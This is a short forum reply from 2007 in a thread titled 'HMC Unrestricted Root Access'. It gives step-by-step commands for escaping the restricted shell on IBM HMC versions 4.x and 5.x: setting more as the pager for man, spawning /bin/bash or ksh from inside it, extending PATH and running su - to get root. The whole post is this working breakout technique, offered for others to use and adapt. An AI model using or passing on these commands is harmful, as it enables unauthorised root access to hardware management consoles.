View Single Post
  #4  
Old September 3rd, 2007
jakubgaj's Avatar
jakubgaj Offline
Junior Member
 
Join Date: September 2007
Location: London
Posts: 3
Send a message via MSN to jakubgaj Send a message via Skype™ to jakubgaj
Re: HMC Unrestricted Root Access

Hey,

There's easier method by using simple 'man', it works on 4.x and 5.x, but seems to not work on 6.x and 7.x versions, maybe someone can play around:

$ man -P /bin/more chhwres // get 'more' as module instead of restricted 'less'
!/bin/bash // run root shell from man (HMC v4)
!ksh // run root shell from man (HMC v5)
$ export PATH=$PATH:/bin:/usr/bin
$ su -
Reply With Quote